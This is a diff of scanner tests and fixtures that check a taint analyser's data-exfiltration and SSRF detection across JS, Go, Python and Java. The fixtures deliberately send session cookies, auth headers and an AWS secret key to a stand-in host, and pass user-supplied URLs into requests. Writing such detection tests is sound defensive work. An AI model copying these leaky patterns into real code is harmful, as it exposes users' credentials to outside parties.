+ let diags = diags_for("fetch_body_int_suppressed.js"); + let exfil = diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count(); + assert_eq!( + exfil, + 0, + "int-typed body must NOT emit taint-data-exfiltration, got {exfil}.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); +} + #[test] fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() { use nyx_scanner::output::build_sarif; @@ -106,20 +193,35 @@ fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() { let results = sarif["runs"][0]["results"] .as_array() .expect("SARIF results array"); - let exfil_results = results + let exfil_results: Vec<&serde_json::Value> = results .iter() .filter(|r| r["ruleId"].as_str() == Some("taint-data-exfiltration")) - .count(); + .collect(); let ssrf_results = results .iter() .filter(|r| r["ruleId"].as_str() == Some("taint-unsanitised-flow")) .count(); assert!( - exfil_results >= 1, - "expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {exfil_results}", + !exfil_results.is_empty(), + "expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {}", + exfil_results.len(), ); assert!( ssrf_results >= 1, "expected >= 1 SARIF result with ruleId taint-unsanitised-flow, got {ssrf_results}", ); + + // Every DATA_EXFIL finding from the fixture set targets the request body + // (`fetch('/endpoint', { body: payload })`), so SARIF must surface the + // destination field via `properties.data_exfil_field`. At least one + // result has to advertise `body`; fixtures that reach `headers` / + // `json` are out of scope for this assertion but must not be silenced. + let body_field_seen = exfil_results + .iter() + .any(|r| r["properties"]["data_exfil_field"].as_str() == Some("body")); + assert!( + body_field_seen, + "expected at least one taint-data-exfiltration SARIF result with \ + properties.data_exfil_field == \"body\". 
Results: {exfil_results:#?}", + ); } diff --git a/tests/fetch_data_exfil_suppression_tests.rs b/tests/fetch_data_exfil_suppression_tests.rs new file mode 100644 index 00000000..b80141c2 --- /dev/null +++ b/tests/fetch_data_exfil_suppression_tests.rs @@ -0,0 +1,142 @@ +//! `Cap::DATA_EXFIL` suppression-layer integration tests. +//! +//! Three layers are exercised: +//! +//! 1. Sanitizer convention. `logEvent({user: req.cookies.session})` +//! routes a Sensitive cookie source through a named telemetry +//! boundary; the default sanitizer rule for `logEvent` clears the +//! cap. +//! 2. Per-project destination allowlist. With +//! `detectors.data_exfil.trusted_destinations = ["https://api.internal/"]` +//! installed via the runtime, a `fetch('https://api.internal/...', +//! {body: tainted})` call has the cap suppressed for that gate only; +//! a `fetch('https://untrusted.example.com/...', ...)` call on a +//! destination NOT in the allowlist still emits the finding. +//! 3. Detector-class enabled toggle. When +//! `detectors.data_exfil.enabled = false` is installed, no +//! `taint-data-exfiltration` finding is emitted regardless of which +//! gate would have fired. +//! +//! All sub-cases run inside a single `#[test]` so the global +//! `detector_options` runtime is mutated sequentially. Each sub-case +//! installs its own configuration via `reinstall` and resets to defaults +//! at the end so other test binaries are unaffected. 
+ +mod common; + +use common::scan_fixture_dir; +use nyx_scanner::commands::scan::Diag; +use nyx_scanner::utils::config::AnalysisMode; +use nyx_scanner::utils::detector_options::{DataExfilDetectorOptions, DetectorOptions, reinstall}; +use std::path::PathBuf; + +fn js_fixture_dir() -> PathBuf { + PathBuf::from(env!("CARGO_MANIFEST_DIR")) + .join("tests") + .join("fixtures") + .join("js") +} + +fn diags_for(file: &str) -> Vec<Diag> { + let dir = js_fixture_dir(); + let all = scan_fixture_dir(&dir, AnalysisMode::Full); + all.into_iter().filter(|d| d.path.ends_with(file)).collect() +} + +fn count_data_exfil(diags: &[Diag]) -> usize { + diags + .iter() + .filter(|d| d.id.starts_with("taint-data-exfiltration")) + .count() +} + +fn install_default_detectors() { + reinstall(DetectorOptions::default()); +} + +fn install_with_trusted(prefixes: &[&str]) { + reinstall(DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: true, + trusted_destinations: prefixes.iter().map(|s| (*s).to_string()).collect(), + }, + }); +} + +fn install_disabled() { + reinstall(DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: false, + trusted_destinations: Vec::new(), + }, + }); +} + +#[test] +fn data_exfil_suppression_suite() { + // ── 1. sanitizer-convention: `logEvent` clears the cap. + install_default_detectors(); + let diags = diags_for("fetch_data_exfil_sanitizer_wrap.js"); + assert_eq!( + count_data_exfil(&diags), + 0, + "logEvent default sanitizer must clear DATA_EXFIL.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + + // ── 2a. allowlist drops cap on trusted destination. + install_with_trusted(&["https://api.internal/"]); + let diags = diags_for("fetch_data_exfil_allowlist_suppressed.js"); + assert_eq!( + count_data_exfil(&diags), + 0, + "trusted destination prefix must drop DATA_EXFIL for that filter.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + + // ── 2b. 
negative: a destination NOT in the allowlist still fires. + install_with_trusted(&["https://api.internal/"]); + let diags = diags_for("fetch_data_exfil_external_destination.js"); + assert!( + count_data_exfil(&diags) >= 1, + "destination not in allowlist must still emit DATA_EXFIL.\n\ + Diags: {:#?}", + diags.iter().map(|d| &d.id).collect::<Vec<_>>(), + ); + + // ── 3a. detector toggle off ⇒ no DATA_EXFIL anywhere. + install_disabled(); + let diags_internal = diags_for("fetch_data_exfil_allowlist_suppressed.js"); + let diags_external = diags_for("fetch_data_exfil_external_destination.js"); + let diags_classic = diags_for("fetch_body_data_exfil.js"); + assert_eq!( + count_data_exfil(&diags_internal), + 0, + "enabled=false must suppress DATA_EXFIL on the internal-destination fixture", + ); + assert_eq!( + count_data_exfil(&diags_external), + 0, + "enabled=false must suppress DATA_EXFIL on the external-destination fixture", + ); + assert_eq!( + count_data_exfil(&diags_classic), + 0, + "enabled=false must suppress DATA_EXFIL on the original cookie-leak fixture", + ); + + // ── 3b. re-enable ⇒ classic cookie-leak fixture fires again + // (regression guard for the toggle). + install_default_detectors(); + let diags_classic = diags_for("fetch_body_data_exfil.js"); + assert!( + count_data_exfil(&diags_classic) >= 1, + "after re-enabling, the classic cookie-leak fixture must emit DATA_EXFIL again", + ); + + // Reset to defaults so other tests running later in the same + // process pick up the documented baseline. 
+ install_default_detectors(); +} diff --git a/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js b/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js new file mode 100644 index 00000000..8b6e9499 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js @@ -0,0 +1,16 @@ +var express = require('express'); +var { forward } = require('./helper'); + +var app = express(); + +// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +// session cookie is a Sensitive-tier source, so taint carries the +// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT +// fire — the URL is a hardcoded literal and the cap-vs-position split +// keeps the body's taint from leaking onto the URL's gate. +app.get('/sync', function(req, res) { + var sid = req.cookies.session; + var payload = JSON.stringify({ session: sid }); + forward('https://analytics.internal/track', payload); + res.status(204).end(); +}); diff --git a/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js b/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js new file mode 100644 index 00000000..2aebcbe4 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js @@ -0,0 +1,14 @@ +var express = require('express'); +var { forward } = require('./helper'); + +var app = express(); + +// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL +// must NOT fire — the body is a literal string, not a sensitive source, +// and the cap-vs-position split through the wrapper's summary keeps the +// URL's taint from leaking onto the body's gate. 
+app.get('/proxy', function(req, res) { + var taintedUrl = req.query.url; + forward(taintedUrl, '{"ok":true}'); + res.status(204).end(); +}); diff --git a/tests/fixtures/cross_file_data_exfil_split/expectations.json b/tests/fixtures/cross_file_data_exfil_split/expectations.json new file mode 100644 index 00000000..a3c3641a --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.js" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.js" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_data_exfil_split/helper.js b/tests/fixtures/cross_file_data_exfil_split/helper.js new file mode 100644 index 00000000..568aa557 --- /dev/null +++ b/tests/fixtures/cross_file_data_exfil_split/helper.js @@ -0,0 +1,10 @@ +// Wrapper around `fetch` whose two parameters target distinct gated-sink +// classes on the inner call: `url` is the SSRF gate's destination; `body` +// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts +// the per-position cap split into `param_to_gate_filters` so cross-file +// callers can attribute SSRF vs DATA_EXFIL per argument. 
+function forward(url, body) { + fetch(url, { method: 'POST', body: body }); +} + +module.exports = { forward }; diff --git a/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go b/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go new file mode 100644 index 00000000..ca9e0bb3 --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go @@ -0,0 +1,17 @@ +// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +// session cookie is a Sensitive-tier source, so taint carries the +// DATA_EXFIL bit through to the wrapper's `http.Post` body gate. SSRF must NOT fire — +// the URL is a hardcoded literal and per-position cap attribution keeps +// the body's taint from leaking onto the URL's gate. +package fixture + +import ( + "net/http" + "strings" +) + +func SyncCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + Forward("https://analytics.internal/track", body) +} diff --git a/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go b/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go new file mode 100644 index 00000000..44dbbdf1 --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go @@ -0,0 +1,16 @@ +// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The +// query param is a `Plain` user-input source, so even though it carries +// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL +// for plain inputs. Only SSRF survives. 
+package fixture + +import ( + "net/http" + "strings" +) + +func ProxyTarget(r *http.Request) { + target := r.URL.Query().Get("target") + body := strings.NewReader("hardcoded") + Forward(target, body) +} diff --git a/tests/fixtures/cross_file_go_data_exfil/expectations.json b/tests/fixtures/cross_file_go_data_exfil/expectations.json new file mode 100644 index 00000000..56235c2a --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.go" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.go" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_go_data_exfil/helper.go b/tests/fixtures/cross_file_go_data_exfil/helper.go new file mode 100644 index 00000000..20bdd4ad --- /dev/null +++ b/tests/fixtures/cross_file_go_data_exfil/helper.go @@ -0,0 +1,16 @@ +// Wrapper whose two parameters target distinct gated-sink classes on the +// inner call: `url` is the SSRF gate's destination at `http.Post`'s +// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA +// summary extraction lifts the per-position cap split into +// `param_to_gate_filters` so cross-file callers attribute SSRF vs +// DATA_EXFIL per argument. 
+package fixture + +import ( + "io" + "net/http" +) + +func Forward(url string, body io.Reader) { + http.Post(url, "text/plain", body) +} diff --git a/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py b/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py new file mode 100644 index 00000000..ea98dfad --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py @@ -0,0 +1,18 @@ +"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The +session cookie is a Sensitive-tier source, so taint carries the +DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire — +the URL is a hardcoded literal and the cap-vs-position split keeps the +body's taint from leaking onto the URL's gate. +""" +from flask import Flask, session + +from helper import forward + +app = Flask(__name__) + + +@app.route('/sync') +def sync(): + sid = session.get('user_token') + forward('https://analytics.internal/track', {'session': sid}) + return '', 204 diff --git a/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py b/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py new file mode 100644 index 00000000..87c852cd --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py @@ -0,0 +1,17 @@ +"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL +must NOT fire — the body is a literal dict, not a sensitive source, and +the cap-vs-position split through the wrapper's summary keeps the URL's +taint from leaking onto the body's gate. 
+""" +from flask import Flask, request + +from helper import forward + +app = Flask(__name__) + + +@app.route('/proxy', methods=['POST']) +def proxy(): + tainted_url = request.args.get('url') + forward(tainted_url, {'event': 'proxy_call'}) + return '', 204 diff --git a/tests/fixtures/cross_file_python_data_exfil/expectations.json b/tests/fixtures/cross_file_python_data_exfil/expectations.json new file mode 100644 index 00000000..1191deb3 --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/expectations.json @@ -0,0 +1,22 @@ +{ + "required_findings": [ + { "id_prefix": "taint-unsanitised-flow", "min_count": 1 }, + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [ + { + "id_prefix": "taint-data-exfiltration", + "file_glob": "**/caller_url_tainted.py" + }, + { + "id_prefix": "taint-unsanitised-flow", + "file_glob": "**/caller_body_tainted.py" + } + ], + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/cross_file_python_data_exfil/helper.py b/tests/fixtures/cross_file_python_data_exfil/helper.py new file mode 100644 index 00000000..06ecba7b --- /dev/null +++ b/tests/fixtures/cross_file_python_data_exfil/helper.py @@ -0,0 +1,12 @@ +"""Wrapper around requests.post whose two parameters target distinct +gated-sink classes on the inner call: `url` is the SSRF gate's destination +(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA +summary extraction lifts the per-position cap split into +`param_to_gate_filters` so cross-file callers can attribute SSRF vs +DATA_EXFIL per argument. 
+""" +import requests + + +def forward(url, body): + requests.post(url, json=body) diff --git a/tests/fixtures/demand_driven_data_exfil/app.py b/tests/fixtures/demand_driven_data_exfil/app.py new file mode 100644 index 00000000..4553a164 --- /dev/null +++ b/tests/fixtures/demand_driven_data_exfil/app.py @@ -0,0 +1,20 @@ +"""demand_driven_data_exfil. + +`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward +engine emits a `taint-data-exfiltration` finding for the cookie → +fetch-body flow (Sensitive source, fixed destination URL). With +`backwards_analysis = true`, the post-pass must walk backwards from the +DATA_EXFIL sink demand, reach the cookie source, and annotate the +finding with `backwards-confirmed`. Validates that the cap-routing +logic in `taint/backwards.rs::DemandState` round-trips bit 13 +(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the +demand-driven suite covers. +""" + +import requests +from flask import request + + +def forward_session(): + sid = request.cookies.get("session") + requests.post("https://analytics.internal/track", json={"session": sid}) diff --git a/tests/fixtures/demand_driven_data_exfil/expectations.json b/tests/fixtures/demand_driven_data_exfil/expectations.json new file mode 100644 index 00000000..8e37c667 --- /dev/null +++ b/tests/fixtures/demand_driven_data_exfil/expectations.json @@ -0,0 +1,16 @@ +{ + "required_findings": [ + { "id_prefix": "taint-data-exfiltration", "min_count": 1 } + ], + "forbidden_findings": [], + "noise_budget": { + "max_total_findings": 4, + "max_high_findings": 2 + }, + "performance_expectations": { + "max_ms_no_index": 1500, + "max_ms_index_cold": 2000, + "max_ms_index_warm": 800, + "ci_mode": "lenient" + } +} diff --git a/tests/fixtures/go/data_exfil_http_post.go b/tests/fixtures/go/data_exfil_http_post.go new file mode 100644 index 00000000..6bf05eb9 --- /dev/null +++ b/tests/fixtures/go/data_exfil_http_post.go @@ -0,0 +1,19 @@ +// DATA_EXFIL fixture: a fixed 
destination URL and a Sensitive (cookie) +// source flowing into the outbound body of `http.Post`. SSRF must NOT +// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on +// the body (position 2) — the auth cookie is exactly the cross-boundary +// state DATA_EXFIL targets. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func leakCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/fixtures/go/data_exfil_map_assign.go b/tests/fixtures/go/data_exfil_map_assign.go new file mode 100644 index 00000000..da22bb39 --- /dev/null +++ b/tests/fixtures/go/data_exfil_map_assign.go @@ -0,0 +1,27 @@ +// Container-taint DATA_EXFIL: a `url.Values` map is populated with +// Sensitive cookie values across two keys, then encoded as form data and +// shipped as the body of an outbound `http.PostForm`. The Go SSA heap +// model marks the map's `Elements` slot tainted on every `form[k] = +// ...` write; the sink-side `collect_tainted_sink_values` heap-loads +// the same slot when checking the form-data argument, so DATA_EXFIL +// must fire on the body channel even though the local map name itself +// is not directly tainted by an Assign. Pairs with +// `data_exfil_post_form.go` (single-write `url.Values` literal — no +// container-mutation step). +// +// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`. 
+package fixture + +import ( + "net/http" + "net/url" +) + +func leakSessionMap(r *http.Request) { + c, _ := r.Cookie("session") + a, _ := r.Cookie("auth") + form := url.Values{} + form["session"] = []string{c.Value} + form["auth"] = []string{a.Value} + http.PostForm("https://analytics.internal/track", form) +} diff --git a/tests/fixtures/go/data_exfil_new_request_do.go b/tests/fixtures/go/data_exfil_new_request_do.go new file mode 100644 index 00000000..c73d92b1 --- /dev/null +++ b/tests/fixtures/go/data_exfil_new_request_do.go @@ -0,0 +1,24 @@ +// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do` +// idiom. `http.NewRequest` is modeled as a body propagator (default +// arg → return propagation lifts body taint onto the returned +// `*http.Request`); the outbound network call happens at +// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the +// request argument. +// +// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and +// the cookie-derived body must surface DATA_EXFIL at the Do call. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func leakViaNewRequest(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + req, _ := http.NewRequest("POST", "https://analytics.internal/track", body) + http.DefaultClient.Do(req) +} diff --git a/tests/fixtures/go/data_exfil_post_form.go b/tests/fixtures/go/data_exfil_post_form.go new file mode 100644 index 00000000..523eceaf --- /dev/null +++ b/tests/fixtures/go/data_exfil_post_form.go @@ -0,0 +1,18 @@ +// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form +// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL +// is hardcoded so SSRF does not fire; only the form-data path activates +// the body-position gate. +// +// Driven by `data_exfil_go_integration_tests.rs`. 
+package fixture + +import ( + "net/http" + "net/url" +) + +func leakAuthHeader(r *http.Request) { + auth := r.Header.Get("Authorization") + form := url.Values{"token": []string{auth}} + http.PostForm("https://analytics.internal/track", form) +} diff --git a/tests/fixtures/go/data_exfil_user_input_silenced.go b/tests/fixtures/go/data_exfil_user_input_silenced.go new file mode 100644 index 00000000..d0e56762 --- /dev/null +++ b/tests/fixtures/go/data_exfil_user_input_silenced.go @@ -0,0 +1,19 @@ +// DATA_EXFIL silenced regression fixture: plain user input echoed into +// the body of an outbound `http.Post` to a fixed URL must NOT fire +// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so +// surfacing it back into the request payload is not a cross-boundary +// disclosure. Source-sensitivity gating in `ast.rs` strips the cap. +// +// Driven by `data_exfil_go_integration_tests.rs`. +package fixture + +import ( + "net/http" + "strings" +) + +func forwardUserInput(r *http.Request) { + msg := r.FormValue("msg") + body := strings.NewReader(msg) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/fixtures/go/ssrf_url_tainted.go b/tests/fixtures/go/ssrf_url_tainted.go new file mode 100644 index 00000000..fbafdb06 --- /dev/null +++ b/tests/fixtures/go/ssrf_url_tainted.go @@ -0,0 +1,18 @@ +// SSRF regression fixture: attacker-controlled destination URL flows +// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the +// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`). +// Cap attribution is per-position so a tainted URL never surfaces as +// data exfiltration. +// +// Driven by `data_exfil_go_integration_tests.rs`. 
+package fixture + +import ( + "net/http" +) + +func proxy(r *http.Request) { + target := r.URL.Query().Get("target") + req, _ := http.NewRequest("GET", target, nil) + http.DefaultClient.Do(req) +} diff --git a/tests/fixtures/java/data_exfil_apache_httpclient.java b/tests/fixtures/java/data_exfil_apache_httpclient.java new file mode 100644 index 00000000..ed3530db --- /dev/null +++ b/tests/fixtures/java/data_exfil_apache_httpclient.java @@ -0,0 +1,27 @@ +// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive) +// is wrapped in a StringEntity (default smear) and attached to an +// HttpPost via setEntity (also default smear). The network call +// happens at `httpClient.execute(req)`, which type-qualified resolution +// rewrites to `HttpClient.execute` via JAVA_HIERARCHY +// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL +// is a hardcoded constant on the HttpPost ctor). +// +// Driven by `data_exfil_java_integration_tests.rs`. +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; +import org.apache.http.HttpResponse; +import org.apache.http.client.methods.HttpPost; +import org.apache.http.entity.StringEntity; +import org.apache.http.impl.client.CloseableHttpClient; +import org.apache.http.impl.client.HttpClients; + +public class DataExfilApacheHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + CloseableHttpClient httpClient = HttpClients.createDefault(); + HttpPost req = new HttpPost("https://analytics.internal/track"); + req.setEntity(new StringEntity(session)); + HttpResponse resp = httpClient.execute(req); + } +} diff --git a/tests/fixtures/java/data_exfil_jdk_httpclient.java b/tests/fixtures/java/data_exfil_jdk_httpclient.java new file mode 100644 index 00000000..d41bb809 --- /dev/null +++ b/tests/fixtures/java/data_exfil_jdk_httpclient.java @@ -0,0 +1,28 @@ +// DATA_EXFIL fixture: 
java.net.http chain. A Sensitive source (cookie) +// flows through `BodyPublishers.ofString(payload)` and the request +// builder chain into `client.send(req)` at a hardcoded URL. SSRF must +// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire +// because the cookie is exactly the cross-boundary state the cap +// targets. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; + +public class DataExfilJdkHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create("https://analytics.internal/track")) + .POST(BodyPublishers.ofString(session)) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/fixtures/java/data_exfil_okhttp.java b/tests/fixtures/java/data_exfil_okhttp.java new file mode 100644 index 00000000..680bc37a --- /dev/null +++ b/tests/fixtures/java/data_exfil_okhttp.java @@ -0,0 +1,28 @@ +// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive) +// is wrapped via `RequestBody.create` (default arg → return smear) +// and bound to the request via the builder chain. The network call +// happens at `client.newCall(req).execute()` which hits the +// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on +// the hardcoded URL. +// +// Driven by `data_exfil_java_integration_tests.rs`. 
+import javax.servlet.http.HttpSession; +import okhttp3.MediaType; +import okhttp3.OkHttpClient; +import okhttp3.Request; +import okhttp3.RequestBody; +import okhttp3.Response; + +public class DataExfilOkHttp { + public void leak(HttpSession session) throws Exception { + String token = (String) session.getAttribute("csrfToken"); + OkHttpClient client = new OkHttpClient(); + RequestBody body = RequestBody.create( + token, MediaType.parse("text/plain")); + Request req = new Request.Builder() + .url("https://analytics.internal/track") + .post(body) + .build(); + Response resp = client.newCall(req).execute(); + } +} diff --git a/tests/fixtures/java/data_exfil_resttemplate.java b/tests/fixtures/java/data_exfil_resttemplate.java new file mode 100644 index 00000000..4fd381e5 --- /dev/null +++ b/tests/fixtures/java/data_exfil_resttemplate.java @@ -0,0 +1,23 @@ +// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a +// Sensitive source) flows directly into the request body of +// `restTemplate.postForObject(url, body, type)`. The destination URL +// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on +// the body position. Type-qualified resolution rewrites +// `restTemplate.postForObject` → `HttpClient.postForObject` via the +// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same +// flat sink rule the JDK client uses. +// +// Driven by `data_exfil_java_integration_tests.rs`. 
+import javax.servlet.http.HttpServletRequest; +import org.springframework.web.client.RestTemplate; + +public class DataExfilRestTemplate { + public void leak(HttpServletRequest request) { + String authHeader = request.getHeader("Authorization"); + RestTemplate restTemplate = new RestTemplate(); + restTemplate.postForObject( + "https://analytics.internal/track", + authHeader, + String.class); + } +} diff --git a/tests/fixtures/java/data_exfil_webclient.java b/tests/fixtures/java/data_exfil_webclient.java new file mode 100644 index 00000000..f9e61864 --- /dev/null +++ b/tests/fixtures/java/data_exfil_webclient.java @@ -0,0 +1,20 @@ +// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var) +// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must +// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the +// body-binding step, since the bare-name `bodyValue` matcher hits +// independent of receiver type. +// +// Driven by `data_exfil_java_integration_tests.rs`. +import org.springframework.web.reactive.function.client.WebClient; + +public class DataExfilWebClient { + public void leak() { + String secret = System.getenv("AWS_SECRET_ACCESS_KEY"); + WebClient webClient = WebClient.create(); + webClient.post() + .uri("https://analytics.internal/track") + .bodyValue(secret) + .retrieve() + .bodyToMono(String.class); + } +} diff --git a/tests/fixtures/java/ssrf_url_only_no_data_exfil.java b/tests/fixtures/java/ssrf_url_only_no_data_exfil.java new file mode 100644 index 00000000..71a14712 --- /dev/null +++ b/tests/fixtures/java/ssrf_url_only_no_data_exfil.java @@ -0,0 +1,25 @@ +// Regression fixture: a tainted URL flowing into HttpClient.send must +// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL. +// The body is a hardcoded literal so no Sensitive payload reaches the +// outbound request. This guards against over-firing DATA_EXFIL on +// flows where only the URL position is attacker-controlled. 
+// +// Driven by `data_exfil_java_integration_tests.rs`. +import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.HttpServletRequest; + +public class SsrfUrlOnlyNoDataExfil { + public void doGet(HttpServletRequest request) throws Exception { + String target = request.getParameter("url"); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create(target)) + .POST(BodyPublishers.ofString("ping")) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/fixtures/js/fetch_body_data_exfil.js b/tests/fixtures/js/fetch_body_data_exfil.js index 8d2792b6..8d7447be 100644 --- a/tests/fixtures/js/fetch_body_data_exfil.js +++ b/tests/fixtures/js/fetch_body_data_exfil.js @@ -1,11 +1,15 @@ -// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced -// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL` -// must fire on the body field — request-bound bytes are leaving the process -// via the outbound request payload. +// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie / +// session) source flowing into the outbound body. SSRF must NOT fire +// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the +// source is Sensitive (`req.cookies.session` carries auth material) — exactly +// the cross-boundary leak the cap targets. +// +// Plain user input echoed back into a body is intentionally not classified +// as data exfiltration, see `fetch_body_user_input_silenced.js`. // // Driven by `fetch_data_exfil_integration_tests.rs`. 
